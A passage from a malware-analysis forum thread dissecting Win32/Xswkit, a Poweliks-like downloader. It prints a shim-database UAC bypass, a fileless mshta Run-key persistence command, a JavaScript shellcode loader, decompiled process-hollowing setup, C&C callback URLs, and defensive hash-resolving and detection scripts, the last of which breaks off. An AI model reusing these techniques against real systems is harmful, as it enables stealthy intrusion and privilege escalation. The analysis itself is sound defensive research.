A forum for reverse engineering, OS internals and malware analysis 

Forum for analysis and discussion about malware.
 #24808  by EP_X0FF
 Sat Jan 03, 2015 12:24 pm
Credits for sample to Tigzy and R136a1, preliminary analysis done by R136a1.

Win32/Xswkit is another clone of Win32/Poweliks, but with a number of additions, such as an embedded UAC bypass and a different startup method (rundll + mshta.exe). Purpose: malware downloader.

Update 04/01/2015
See http://www.kernelmode.info/forum/viewto ... 827#p24827

The UAC bypass is similar to the one used by Gootkit; a reconstructed version can be found -> here.

During installation Xswkit builds a shim database patch, drops it into the %temp% folder and executes sdbinst with the -q parameter and the path to the new database. The entry itself is the RedirectEXE shim:
Code:
 <DATABASE tid="0xf0" typ="LIST">
  <TIME tid="0xf6" typ="QWORD">0x1d014b31a06ce99</TIME>
  <COMPILER_VERSION tid="0x100" typ="STRINGREF">2.1.0.3</COMPILER_VERSION>
  <NAME tid="0x106" typ="STRINGREF">qrywI9lBMKdLH</NAME>
  <OS_PLATFORM tid="0x10c" typ="DWORD">0x1</OS_PLATFORM>
  <DATABASE_ID tid="0x112" typ="BINARY" len="0x10" guid="1AC61212-7AC0-464A-8B9815BC2854072E" />
  <LIBRARY tid="0x128" typ="LIST">
  </LIBRARY>
  <EXE tid="0x12e" typ="LIST">
   <NAME tid="0x134" typ="STRINGREF">cliconfg.exe</NAME>
   <APP_NAME tid="0x13a" typ="STRINGREF">nv0NK43fWQ</APP_NAME>
   <VENDOR tid="0x140" typ="STRINGREF">Microsoft</VENDOR>
   <EXE_ID tid="0x146" typ="BINARY" len="0x10" guid="E6D3E2BF-6CBF-0C43-B41AA519B962860C" />
   <MATCHING_FILE tid="0x15c" typ="LIST">
    <NAME tid="0x162" typ="STRINGREF">*</NAME>
    <COMPANY_NAME tid="0x168" typ="STRINGREF">Microsoft Corporation</COMPANY_NAME>
    <INTERNAL_NAME tid="0x16e" typ="STRINGREF">cliconfg.exe</INTERNAL_NAME>
   </MATCHING_FILE>
   <SHIM_REF tid="0x174" typ="LIST">
    <NAME tid="0x17a" typ="STRINGREF">RedirectEXE</NAME>
    <COMMAND_LINE tid="0x180" typ="STRINGREF">"C:\Malware\1.exe" -z "C:\Users\UserMan\AppData\Local\Temp\AF293.tmp"</COMMAND_LINE>
   </SHIM_REF>
  </EXE>
 </DATABASE>

So the malware installation steps are the following:

1) generate the SDB shim patch and drop it into the %temp% folder
2) register the shim with sdbinst (no UAC prompt on default UAC settings)
3) run the target application -> cliconfg.exe, then terminate itself
4) cliconfg.exe (no UAC prompt on default UAC settings) executes the malicious shim and starts the malware dropper again with the given command line arguments
5) the dropper installs itself into the system with full admin rights

Below is R136a1's analysis, which he was so kind to share.
R136a1 wrote: 1) Set value in Registry:
Key: HKEY_CURRENT_USER\Software
Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)

2) Create Key and set values in Registry:
Key: HKEY_CURRENT_USER\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code

3) Create new process C:\WINDOWS\system32\svchost.exe (Process hijack)

4) Exit old process

5) Set value in Registry:
Key: HKEY_CURRENT_USER\Software
Value: {d42d0afb-3638-4326-b67b-b0cb954fba94} (REG_SZ)

6) Create Key and set values in Registry:
Key: HKEY_USERS\.DEFAULT\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

7) Create Key and set values in Registry:
Key: HKEY_USERS\S-1-5-19\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

8) Create Key and set values in Registry:
Key: HKEY_USERS\S-1-5-20\Software\ xsw
Value: binaryImage32 (REG_BINARY) -> Copy of itself
Value: loader (REG_SZ) -> Javascript code
Set Key in Registry:
Key: HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run
Value: rundll32 (REG_SZ)
Data: mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"

9) Download and install a lot of root certificates

10) Set values in Registry:
Key: HKEY_CURRENT_USER\Software
Value: binaryImage32_0...binaryImage32_5 (REG_BINARY)
Data: ...

11) Inject code into explorer.exe (+ firefox.exe + iexplore.exe after opening)

??? 12) ESENT.dll loading by injected processes ???

13) Create Key and set values in Registry:
Key: HKEY_CURRENT_USER\Software\cxsw
Value: {c1e2bc64-8d94-461f-a485-50a7322bfb4a} (REG_BINARY)
Data: ...
Value: {da14b39e-535a-4b08-9d68-ba6d14fed630} (REG_BINARY)
Data: ...
R136a1 wrote:More from mutex {a1ba4f72-9762-4864-8889-478ac3bdb354}:
https://www.virustotal.com/en/file/658c ... /analysis/
https://www.virustotal.com/en/file/2baf ... /analysis/

More from registry value {d42d0afb-3638-4326-b67b-b0cb954fba94}:
http://totalhash.com/analysis/efd11b782 ... 0c804ece07
http://totalhash.com/analysis/dded6ea73 ... cc5b32bcc5
http://totalhash.com/analysis/0bd288047 ... 9f02b2befa
http://totalhash.com/analysis/258fc44bd ... ee5850c9c1
http://www.threatexpert.com/report.aspx ... e1c1d8b956
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
http://www.sophos.com/de-de/threat-cent ... lysis.aspx
R136a1 wrote:Malware uses the Windows tool mshta.exe and DynamicWrapperX:
http://yuripopov.ucoz.net/index/dwx_reg ... de_en/0-27
Let's continue.

The loader script is very large (144 KB), as it contains a copy of mshta.exe, dynwrapx.dll, their manifests and the shellcode; you will find everything in the attachment.

How the malware operates after a reboot.

It runs from the Software\Microsoft\Windows\CurrentVersion\Run key by rundll32, which executes the following
Code:
mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>"
A hidden window with a script that does the next loading stage.

Once executed, it performs the following piece of code, read from the loader registry value at the previous stage:
Code:
try {
	// DynamicWrapperX is a third-party COM component that lets script call native code.
	// Fails with an exception if the component is not yet available, see catch below.
	var DWX = new ActiveXObject("DynamicWrapperX");
	ExecuteShellCode();
	function ExecuteShellCode(){
		// ShellcodeHexStr is the hex-encoded shellcode held in the same loader script;
		// RegisterCode turns it into a callable ("i=l": one long argument, "r=l": long return)
		var CodeAddr = DWX.RegisterCode(ShellcodeHexStr, "executeCode", "i=l", "r=l");
		DWX.executeCode(0);
	}

	Exit();   // Exit() is defined elsewhere in the loader

} catch(e) {
	// DynamicWrapperX not available: drop it and relaunch through the bundled mshta.exe
	SetupDWX();
}
It attempts to create a new ActiveXObject "DynamicWrapperX", which allows code execution; if this fails, it installs these additions in the SetupDWX routine.
Code:
function SetupDWX()
{
	// FileExists(), UnpackResource(), DefaultDir, WshShell and HTARunCommand are defined
	// elsewhere in the loader script. Drops a private copy of mshta.exe and dynwrapx.dll
	// plus side-by-side manifests, so the COM object works without registering it.
	if (!FileExists(DefaultDir+"mshta.exe")) UnpackResource("mshta.exe", DefaultDir +"mshta.exe");
	if (!FileExists(DefaultDir+"dynwrapx.dll")) UnpackResource("dynwrapx.dll", DefaultDir +"dynwrapx.dll");
	if (!FileExists(DefaultDir+"dynwrapx.sxs.manifest")) UnpackResource("dynwrapx.sxs.manifest", DefaultDir +"dynwrapx.sxs.manifest");
	if (!FileExists(DefaultDir+"mshta.exe.manifest")) UnpackResource("mshta.exe.manifest", DefaultDir +"mshta.exe.manifest");

	// relaunch: "<DefaultDir>mshta.exe" "<HTARunCommand>", hidden window, do not wait
	WshShell.Run('"'+DefaultDir+"mshta.exe\" \""+HTARunCommand+'"',0,0);
	Exit();
}
The shellcode section is also read from the loader registry key, and this is the final malware startup stage. Its main purpose: read the actual malware body stored in the registry as binaryImageXX value data (where XX is the platform, 32 or 64), start a suspended svchost.exe, unmap its original code, map the malicious payload and run it.

The shellcode uses API hashing and a global shellcode description structure, dynamically allocated during execution.

Below is the API hashing function
Code:
/* Classic djb2: seed 5381 (0x1505), h = h * 33 + c over the ASCII export name.
   unsigned long is 32-bit on Windows, so the value wraps mod 2^32. */
unsigned long get_hash(char *s)
{
	unsigned long v1 = 0x1505;

	while (*s != 0) {
		v1 += *(unsigned char *)s + (v1 << 5);   /* v1 = v1*33 + c */
		s++;
	}
	return v1;
}
and the shell context allocation routine
Code:
struct_v23 *__cdecl CreateShellContext()
{
  int hUser32; // eax@4
  int v1; // eax@4
  int v2; // eax@4
  int v4; // [sp+0h] [bp-50h]@1
  int v5; // [sp+4h] [bp-4Ch]@1
  int v6; // [sp+8h] [bp-48h]@1
  int v7; // [sp+Ch] [bp-44h]@1
  int v8; // [sp+10h] [bp-40h]@1
  int v9; // [sp+14h] [bp-3Ch]@1
  int v10; // [sp+18h] [bp-38h]@1
  int szAdvapi32; // [sp+1Ch] [bp-34h]@1
  int v12; // [sp+20h] [bp-30h]@1
  int v13; // [sp+24h] [bp-2Ch]@1
  int v14; // [sp+28h] [bp-28h]@1
  int szNtdll; // [sp+2Ch] [bp-24h]@1
  int v16; // [sp+30h] [bp-20h]@1
  int v17; // [sp+34h] [bp-1Ch]@1
  int szUser32; // [sp+38h] [bp-18h]@1
  int v19; // [sp+3Ch] [bp-14h]@1
  int v20; // [sp+40h] [bp-10h]@1
  int VirtualAlloc; // [sp+44h] [bp-Ch]@2
  int hKernel32; // [sp+48h] [bp-8h]@1
  struct_v23 *shell_ctx; // [sp+4Ch] [bp-4h]@1

  shell_ctx = 0;
  v4 = 'e\0k';
  v5 = 'n\0r';
  v6 = 'l\0e';
  v7 = '2\03';
  v8 = 'd\0.';
  v9 = 'l\0l';
  v10 = 0;
  hKernel32 = GetModuleHandle(&v4);
  szNtdll = 'ldtn';
  v16 = 'ld.l';
  v17 = 'l';
  szAdvapi32 = 'avda';
  v12 = '23ip';
  v13 = 'lld.';
  v14 = 0;
  szUser32 = 'resu';
  v19 = 'd.23';
  v20 = 'll';
  if ( hKernel32 )
  {
    VirtualAlloc = ApiFromHash(hKernel32, 0x382C0F97u);
    if ( VirtualAlloc )
    {
      shell_ctx = (VirtualAlloc)(0, 0xC4u, 0x3000u, 64);
      if ( shell_ctx )
      {
        shell_ctx->hKernel32 = hKernel32;
        shell_ctx->VirtualAlloc = VirtualAlloc;
        shell_ctx->VirtualFree = ApiFromHash(shell_ctx->hKernel32, 0x668FCF2Eu);
        shell_ctx->Sleep = ApiFromHash(shell_ctx->hKernel32, 0xE19E5FEu);
        shell_ctx->LoadLibraryExA = ApiFromHash(shell_ctx->hKernel32, 0x4F803C78u);
        shell_ctx->CreateThread = ApiFromHash(shell_ctx->hKernel32, 0x7F08F451u);
        shell_ctx->lstrlenA = ApiFromHash(shell_ctx->hKernel32, 0xD2C4AB0Au);
        shell_ctx->GetProcAddress = ApiFromHash(shell_ctx->hKernel32, 0xCF31BB1Fu);
        shell_ctx->LocalFree = ApiFromHash(shell_ctx->hKernel32, 0xA66DF372u);
        shell_ctx->CloseHandle = ApiFromHash(shell_ctx->hKernel32, 0x3870CA07u);
        shell_ctx->GetCurrentProcess = ApiFromHash(shell_ctx->hKernel32, 0xCA8D7527u);
        shell_ctx->ExpandEnvironmentStringsW = ApiFromHash(shell_ctx->hKernel32, 0x7487495Bu);
        shell_ctx->CreateProcessW = ApiFromHash(shell_ctx->hKernel32, 0xAEB52E2Fu);
        shell_ctx->GetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0xEBA2CFC2u);
        shell_ctx->ReadProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0xB8932459u);
        shell_ctx->lstrcatW = ApiFromHash(shell_ctx->hKernel32, 0xD2BFAB79u);
        shell_ctx->ResumeThread = ApiFromHash(shell_ctx->hKernel32, 0x74162A6Eu);
        shell_ctx->SetThreadContext = ApiFromHash(shell_ctx->hKernel32, 0x7E20964Eu);
        shell_ctx->VirtualProtectEx = ApiFromHash(shell_ctx->hKernel32, 0xD812922Au);
        shell_ctx->WriteProcessMemory = ApiFromHash(shell_ctx->hKernel32, 0x6F22E8C8u);
        shell_ctx->VirtualAllocEx = ApiFromHash(shell_ctx->hKernel32, 0xF36E5AB4u);
        shell_ctx->hNtdll = shell_ctx->LoadLibraryExA(&szNtdll, 0, 0);
        shell_ctx->RtlCreateHeap = ApiFromHash(shell_ctx->hNtdll, 0xAFAAC189u);
        shell_ctx->RtlAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xC0B381DAu);
        shell_ctx->RtlReAllocateHeap = ApiFromHash(shell_ctx->hNtdll, 0xBBC97911u);
        shell_ctx->RtlFreeHeap = ApiFromHash(shell_ctx->hNtdll, 0x70BA71D7u);
        shell_ctx->NtTerminateThread = ApiFromHash(shell_ctx->hNtdll, 0xAC3C9DC8u);
        shell_ctx->RtlDecompressBuffer = ApiFromHash(shell_ctx->hNtdll, 0xF73BBD46u);
        shell_ctx->NtOpenKey = ApiFromHash(shell_ctx->hNtdll, 0x4BB73E02u);
        shell_ctx->wcslen = ApiFromHash(shell_ctx->hNtdll, 0x24B549F1u);
        shell_ctx->NtUnmapViewOfSection = ApiFromHash(shell_ctx->hNtdll, 0x595014ADu);
        shell_ctx->hAdvapi32 = shell_ctx->LoadLibraryExA(&szAdvapi32, 0, 0);
        shell_ctx->RegOpenKeyExW = ApiFromHash(shell_ctx->hAdvapi32, 0x74A9772u);
        shell_ctx->ConvertSidToStringSidW = ApiFromHash(shell_ctx->hAdvapi32, 0x99A22DD7u);
        shell_ctx->RegSetValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x345872EAu);
        shell_ctx->RegQueryValueExA = ApiFromHash(shell_ctx->hAdvapi32, 0x6B95D114u);
        shell_ctx->RegOpenKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x74A975Cu);
        shell_ctx->RegCreateKeyExA = ApiFromHash(shell_ctx->hAdvapi32, 0x46CEB39Eu);
        shell_ctx->RegCloseKey = ApiFromHash(shell_ctx->hAdvapi32, 0x736B3702u);
        shell_ctx->RegEnumKeyA = ApiFromHash(shell_ctx->hAdvapi32, 0xF367EA22u);
        shell_ctx->OpenProcessToken = ApiFromHash(shell_ctx->hAdvapi32, 0xC57BD097u);
        shell_ctx->GetTokenInformation = ApiFromHash(shell_ctx->hAdvapi32, 0x8ED47F2Cu);
        shell_ctx->IsValidSid = ApiFromHash(shell_ctx->hAdvapi32, 0x3D180391u);
        hUser32 = (shell_ctx->LoadLibraryExA)(&szUser32, 0, 0);
        shell_ctx->MessageBoxA = ApiFromHash(hUser32, 0x384F14B4u);
        shell_ctx->wsprintfA = ApiFromHash(hUser32, 0xF898B8C3u);
        shell_ctx->wsprintfW = ApiFromHash(hUser32, 0xF898B8D9u);
        shell_ctx->hHeap = shell_ctx->RtlCreateHeap(2, 0, 0, 0, 0);
      }
    }
  }
  return shell_ctx;
}
and the svchost spawning code (shown as a screenshot in the original post).

Strings from the actual malware
Code:
RtlCreateUserThread NtClose InternetReadFile    HttpOpenRequestA    InternetCloseHandle HttpSendRequestA    InternetOpenA   InternetConnectA    HttpQueryInfoA  InternetQueryOptionA    InternetSetOptionA  InternetSetFilePointer  HttpAddRequestHeadersA  L a s t H a r d w a r e H a s h     b i n a r y I m a g e % d   % s _ % d   \ R E G I S T R Y \ U S E R \ % s   \ R e g i s t r y \ U s e r     % S y s t e m R o o t % \ S y s t e m 3 2 \ n t d l l . d l l   RtlDecompressBuffer ntdll.dll   RtlComputeCrc32 a p p h e l p . d l l   SdbBeginWriteListTag    SdbCloseDatabase    SdbCloseDatabaseWrite   SdbCommitIndexes    SdbCreateDatabase   SdbDeclareIndex SdbEndWriteListTag  SdbFindFirstDWORDIndexedTag SdbFindFirstTag SdbFindNextTag  SdbFormatAttribute  SdbFreeFileAttributes   SdbGetAppPatchDir   SdbGetBinaryTagData SdbGetFileAttributes    SdbGetFirstChild    SdbGetIndex SdbGetMatchingExe   SdbGetNextChild SdbGetStringTagPtr  SdbGetTagFromTagID  SdbInitDatabase SdbIsStandardDatabase   SdbMakeIndexKeyFromString   SdbOpenApphelpDetailsDatabase   SdbOpenApphelpResourceFile  SdbOpenDatabase SdbQueryDataExTagID SdbReadApphelpDetailsData   SdbReadBinaryTag    SdbReadDWORDTag SdbReadQWORDTag SdbReadStringTag    SdbRegisterDatabaseEx   SdbReleaseDatabase  SdbReleaseMatchingExe   SdbStartIndexing    SdbStopIndexing SdbTagRefToTagID    SdbTagToString  SdbUnregisterDatabase   SdbWriteBinaryTag   SdbWriteBinaryTagFromFile   SdbWriteDWORDTag    SdbWriteNULLTag SdbWriteQWORDTag    SdbWriteStringTag   SdbWriteWORDTag ShimFlushCache  BaseFlushAppcompatCache generic unknown error   iostream    iostream stream error   system  2 . 1 . 0 . 
3   dж@ °H@ PI@ `I@ РH@ 0I@ рH@ з@ °H@ рI@ `I@  J@ 0I@ рH@ Дж@ °H@ ђI@  I@ РH@ 0I@ рH@ °ж@ °H@ 0@ 0@ РH@ 0I@ рH@ SHGetKnownFolderPath    Shell32.dll SHGetSpecialFolderPathW     \ R e g i s t r y \ M a c h i n e \ S o f t w a r e \ M i c r o s o f t \ C r y p t o g r a p h y   M a c h i n e G u i d       \ R E G I S T R Y \ U S E R \ % s \ S o f t w a r e \ A p p D a t a L o w   \ R E G I S T R Y \ U S E R \ % s \ S o f t w a r e     \ R E G I S T R Y \ U S E R \ % s \ % s     S e R e s t o r e P r i v i l e g e     dз@ pm@ - z     c l i c o n f g . e x e     s d b i n s t . e x e       a b c d e f g h i j k l m n o p q r s t v u w x y z A B C D E F G H I J K L M N O P Q R S T U V W 0 1 2 3 4 5 6 7 8 9 _         A   S y s W O W 6 4     s y s t e m 3 2     \   M i c r o s o f t   R e d i r e c t E X E   M i c r o s o f t   C o r p o r a t i o n   *   "       "       - q   " % s "   - q   - u   " % s "     r u n a s   IsWow64Process  k e r n e l 3 2 . d l l     explorer.exe    chrome.exe  opera.exe   iexplore.exe    lsass.exe   firefox.exe LoadLibraryExA  kernel32.dll    GetProcAddress  VirtualProtect  VirtualAlloc    CreateThread    VirtualQuery    ZwOpenProcess   % S y s t e m R o o t % \ S y s t e m 3 2 \     b i n a r y I m a g e 3 2   l o a d e r     { d 4 2 d 0 a f b - 3 6 3 8 - 4 3 2 6 - b 6 7 b - b 0 c b 9 5 4 f b a 9 4 }     w i n d i r     % s \ s y s t e m 3 2 \ c m d . e x e     / c   " s t a r t   % s "     d e s k t o p . i n i   { 2 7 3 b 5 8 8 4 - 3 6 2 d - 4 f f 7 - 8 d 6 5 - 6 4 a c 2 e 7 f c 2 9 1 }     \ h u i     % s \ h u i % d . e x e     { a 1 b a 4 f 7 2 - 9 7 6 2 - 4 8 6 4 - 8 8 8 9 - 4 7 8 a c 3 b d b 3 5 4 }     \ s v c h o s t . e x e     s v c h o s t . e x e                   @      @   LdrGetProcedureAddress  NtAllocateVirtualMemory NtFreeVirtualMemory NtWriteVirtualMemory    H                                                      F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb
No actual name, except
F:\Devel\usermode-rootkit\usermode-rootkit\bin\usermode-rootkit_Win32.pdb
I'm curious when they will realize that the /DEBUG option should be turned off in release builds.

The original dropper, unpacked malware, full loader text and extracted shellcode are in the attachment.

VT
original
https://www.virustotal.com/en/file/ed3d ... 420287664/

unpacked
https://www.virustotal.com/en/file/c388 ... 420287667/

No actual detection, only trash.

P.S.
+ actual loading screenshot; as you can see, Sysinternals Autoruns cannot recognize this entry as rogue. What's more, if you select Verify Digital Signatures it will list it as totally legit.

Attachments (pass: infected)
 #24811  by Tigzy
 Sat Jan 03, 2015 1:38 pm
I don't find any protection/watchdog protecting the persistence item (Run key). I'm able to manually remove it from regedit, and after a reboot the infection is gone.
Am I just lucky? :?:
 #24812  by Kafeine
 Sat Jan 03, 2015 2:00 pm
From what I understand, the team behind this is the Gootkit team, and they have been focused on France for months.
The loaders I saw tied to this team were pushed by Angler (directly) or by Bedep (after Angler Fileless).

Illustration.

Here on 2014-09-23 (screenshot in the original post):
C&C callback:
https://transferringcert .com/rbody32

Associated sample: c8bfbc4f2eae6aca111a218c93be7bfd, 148k (can't tell if it's already what you are calling Xswkit, but Horgh spotted these strings in it in September:
.text:00407AC8 0000004A C F:\\Devel\\usermode-rootkit\\usermode-rootkit\\bin\\usermode-rootkit_Win32.pdb
)

Here is another example, on 2014-10-15 (screenshot in the original post):
C&C callback:
https://localsea .org /bootcode
https://localsea .org/driver32 (same as rbody)

Associated sample: 61c2c96ae36ccda1854523a1352ce523, 102k

And one more, on 2014-12-10 (screenshot in the original post):

c05453a18b6dc45bc258a377d2161b1c, 508k
Samples associated with that infection vector:
f5fb91684ea1f8cdfaeaa54e70737cab 236k
04a03d1329efa04a3e60a04ddadf9715 148k


C&C callback:
https://spaceministrer .com/rbody32
https://spaceministrer .com/rbody64
Attachments: Gootkit Package. Password: infected
 #24813  by EP_X0FF
 Sat Jan 03, 2015 2:24 pm
Tigzy wrote:I don't find any protection/watchdog protecting the persistence item (Run key). I'm able to manually remove it from regedit, and after a reboot the infection is gone.
Am I just lucky? :?:
Not only you, it can be removed with plain Autoruns (just turn off the default Microsoft filter to see this infection) in one click.

Overall this malware looks a bit... under construction. For example, this shellcode has support for loading "binaryImage64" registry data (that's why I named it WinNT), but it is unused, because the routine responsible for registry payload extraction always takes 0x20 (32) as the execution mode parameter; also some routines from the shellcode context seem totally unused. There is no obfuscation for the loader scripts either. The executable build date indicates it was compiled at the beginning of December 2014. Also the pdb string name indicates there should be some hmmm "rootkit" capabilities, but nothing like this was found.
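The hashing routine in the first post is plain djb2 over the ASCII export name, which means the constants in the decompiled CreateShellContext can be resolved offline. The script below is an added example (my own code, not the shellcode's or the post's) that reimplements get_hash() in Python, resolves a handful of the constants against a candidate export list, and annotates decompiler output in place. The candidate list is a constructed subset of kernel32/ntdll/advapi32/user32 exports plus decoys; a real run would feed it the full export tables. The three constants asserted on are the VirtualAlloc, Sleep and CloseHandle values from the decompilation above. Because nothing sample-specific is mixed into the hash, the same table works for any shellcode that uses unmodified djb2.

```python
import re


def api_hash(name):
    """The shellcode's get_hash(): djb2, seed 0x1505, h = h*33 + c, over the ASCII name, 32-bit wrap."""
    h = 0x1505
    for b in name.encode("ascii"):
        h = (h * 33 + b) & 0xFFFFFFFF
    return h


# Constructed candidate list: the exports named in the decompiled CreateShellContext
# plus a few decoys. Replace with the real export tables for a full resolution.
CANDIDATE_EXPORTS = [
    "VirtualAlloc", "VirtualFree", "Sleep", "LoadLibraryExA", "CreateThread", "lstrlenA",
    "GetProcAddress", "LocalFree", "CloseHandle", "GetCurrentProcess", "CreateProcessW",
    "GetThreadContext", "SetThreadContext", "ResumeThread", "ReadProcessMemory",
    "WriteProcessMemory", "VirtualAllocEx", "VirtualProtectEx", "NtUnmapViewOfSection",
    "RtlDecompressBuffer", "RtlCreateHeap", "RegOpenKeyExW", "MessageBoxA", "wsprintfA",
    "VirtualAllocExNuma", "VirtualFreeEx", "SleepEx",
]


def build_table(names):
    """hash -> export name; a 32-bit collision between two candidates is reported, not hidden."""
    table = {}
    for n in names:
        h = api_hash(n)
        if h in table and table[h] != n:
            raise ValueError(f"djb2 collision: {table[h]} / {n}")
        table[h] = n
    return table


def resolve_hashes(constants, names):
    """Map each hash constant to a name, or None when no candidate hashes to it."""
    table = build_table(names)
    return {c: table.get(c) for c in constants}


# Matches the call shape in the decompilation: ApiFromHash(<module>, 0x382C0F97u)
HASH_CALL_RE = re.compile(r"ApiFromHash\([^,]+,\s*0x([0-9A-Fa-f]+)u?\)")


def annotate_decompilation(text, names):
    """Append /* name */ after every ApiFromHash(..., 0xXXXXu) call in decompiler output."""
    table = build_table(names)

    def repl(m):
        return f"{m.group(0)} /* {table.get(int(m.group(1), 16), 'unresolved')} */"

    return HASH_CALL_RE.sub(repl, text)


# Constructed excerpt in the shape of the decompiled routine above; the last line is a
# deliberately unknown constant to show the unresolved case.
SAMPLE_DECOMP = """\
shell_ctx->VirtualAlloc = ApiFromHash(hKernel32, 0x382C0F97u);
shell_ctx->Sleep = ApiFromHash(shell_ctx->hKernel32, 0xE19E5FEu);
shell_ctx->CloseHandle = ApiFromHash(shell_ctx->hKernel32, 0x3870CA07u);
shell_ctx->Decoy = ApiFromHash(shell_ctx->hKernel32, 0xDEADBEEFu);
"""

if __name__ == "__main__":
    print(annotate_decompilation(SAMPLE_DECOMP, CANDIDATE_EXPORTS))
```

The resolver hashes candidate names rather than trying to invert the constants, so its coverage is only as good as the export list you feed it; when a constant stays unresolved, the usual causes are a name from a DLL you did not include or a sample that seeded or post-processed the hash differently.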
 #24815  by Tigzy
 Sat Jan 03, 2015 2:32 pm
OK, thanks for the confirmation.
The customer who reported the problem said that after removing the Run key the infection was back after a reboot, which I can't reproduce. Seems weird, I'll ask them to double check.
 #24816  by Tigzy
 Sat Jan 03, 2015 2:46 pm
Possible hooks made by the malware:
(No hooks are found when the malware isn't loaded)
¤¤¤ Processes : 4 ¤¤¤
[Tr.Gootkit] explorer.exe -- C:\WINDOWS\Explorer.EXE[7] -> [NoKill]
[Tr.Gootkit] svchost.exe -- C:\WINDOWS\System32\svchost.exe[x] -> [NoKill]
[Proc.Svchost] svchost.exe -- C:\WINDOWS\System32\svchost.exe[7] -> [NoKill]
[Tr.Gootkit] firefox.exe -- C:\Program Files\Mozilla Firefox\firefox.exe[7] -> [NoKill]

¤¤¤ Registry : 14 ¤¤¤
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run | rundll32 : mshta "about:<title> </title><script>moveTo(-300,-300);resizeTo(0,0);</script><hta:application showintaskbar=no><script>eval(new ActiveXObject('WScript.Shell').RegRead('HKCU\\Software\\ xsw\\loader'));if(!window.flag)close()</script>" -> Found
[Tr.Gootkit] HKEY_USERS\.DEFAULT\Software\ xsw -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-19\Software\ xsw -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-20\Software\ xsw -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-21-823518204-842925246-839522115-1003\Software\ xsw -> Found
[Tr.Gootkit] HKEY_USERS\S-1-5-18\Software\ xsw -> Found

¤¤¤ Antirootkit : 4 (Driver: Loaded) ¤¤¤
[IAT:Inl(Hook.IEAT)] (explorer.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x31939ba (jmp 0xffffffff8684f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - NtDeviceIoControlFile : Unknown @ 0x1ecfa65 (jmp 0xffffffff855b2852|jmp 0x39|call 0xffffffffffffff3e)
[IAT:Inl(Hook.IEAT)] (firefox.exe) ntdll.dll - RtlPcToFileHeader : Unknown @ 0x1e839ba (jmp 0xffffffff8553f61d|jmp 0xf)
[IAT:Inl(Hook.IEAT)] (firefox.exe) DNSAPI.dll - DnsQuery_W : Unknown @ 0x1ecf8d0 (jmp 0xffffffff8affcb3c)
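The registry hits in the log above all share one shape: a Run value named after a Windows binary whose data launches mshta with an inline about: HTA that evals whatever RegRead() returns. As an added example, not RogueKiller's code or anything from the post, the following Python runs that check over Run-key entries supplied as (hive path, value name, data) tuples and, when it fires, parses the RegRead() argument so the loader key is listed next to the Run value that should be removed with it. The entries are constructed from the log (the third one is an invented benign control), and the look-alike name set is an assumption.

```python
import re

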